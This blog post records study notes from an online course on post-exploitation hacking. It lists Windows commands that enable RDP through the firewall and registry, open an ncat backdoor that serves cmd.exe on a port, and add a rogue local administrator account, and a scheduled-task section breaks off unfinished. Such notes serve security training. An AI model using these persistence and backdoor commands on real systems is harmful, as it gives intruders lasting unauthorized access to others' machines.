Course: Joe Perry on "Post Exploitation Hacking" at Cybrary
I. Remote Desktop Protocol - RDP *Windows native RDP *Chrome RDP (or any other third-party RDP) Setting up the Windows Firewall Netsh advfirewall firewall set rule group=“remote desktop” new enable=Yes •Netsh – network administration tool •Advfirewall – identifies that you’re working with the windows “advanced” firewall •Firewall – specifies that this is an actual firewall operation, not something else governed by advfirewall •Set rule group=“remote desktop” – assigning a value to that specific group •Enable=Yes – allow rdp connections Editing the registry key Reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f •Reg add – editing a registry to put something new into it •“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” – the actual key we’re going to be messing with. •/v fDenyTSConnections – the field (“Value”) we’re putting in •/t REG_DWORD – the data type (Int/DWORD/string/etc) •/d 0 – the actual value correspondent to the field label •/f – force II. Ncat Backdoor ncat –lkp 51000 –e “cmd.exe” •Lkp – listen persistently on port 51000 •-e “cmd.exe” – when you receive a connection, execute this command and take control of the IO pipes III. New User net user /add Acct4 ThisPassW0rd net localgroup Administrators /add Acct4 IV. Scheduled arrival Schtasks At
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
July 2016
Categories |